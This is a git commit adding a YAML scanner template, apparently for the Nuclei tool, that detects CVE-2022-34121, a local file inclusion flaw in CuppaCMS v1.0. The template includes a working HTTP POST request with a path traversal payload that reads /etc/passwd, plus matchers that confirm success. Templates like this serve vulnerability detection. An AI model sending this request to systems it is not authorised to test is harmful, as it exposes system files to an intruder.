Add CVE-2022-34121

patch-1
edoardottt 2022-09-18 08:08:37 +02:00
parent 470eba0ef6
commit b9dd29ff62
1 changed files with 37 additions and 0 deletions

View File

@ -0,0 +1,37 @@
id: CVE-2022-34121
info:
name: CuppaCMS v1.0 - Local File Inclusion
author: edoardottt
severity: high
description: |
Cuppa CMS v1.0 was discovered to contain a local file inclusion (LFI) vulnerability via the component /templates/default/html/windows/right.php.
reference:
- https://github.com/hansmach1ne/MyExploits/tree/main/LFI_in_CuppaCMS_templates
- https://nvd.nist.gov/vuln/detail/CVE-2022-34121
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-34121
cwe-id: CWE-829
tags: cve,cve2022,lfi,cuppa,cms
requests:
- raw:
- |
POST /cuppa/templates/default/html/windows/right.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
url=../../../../../../../../../../../../etc/passwd
matchers-condition: and
matchers:
- type: word
words:
- "root:x:0"
- type: status
status:
- 200